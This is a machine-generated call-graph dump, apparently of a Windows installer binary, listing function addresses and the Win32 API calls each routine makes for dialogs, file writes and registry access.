4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 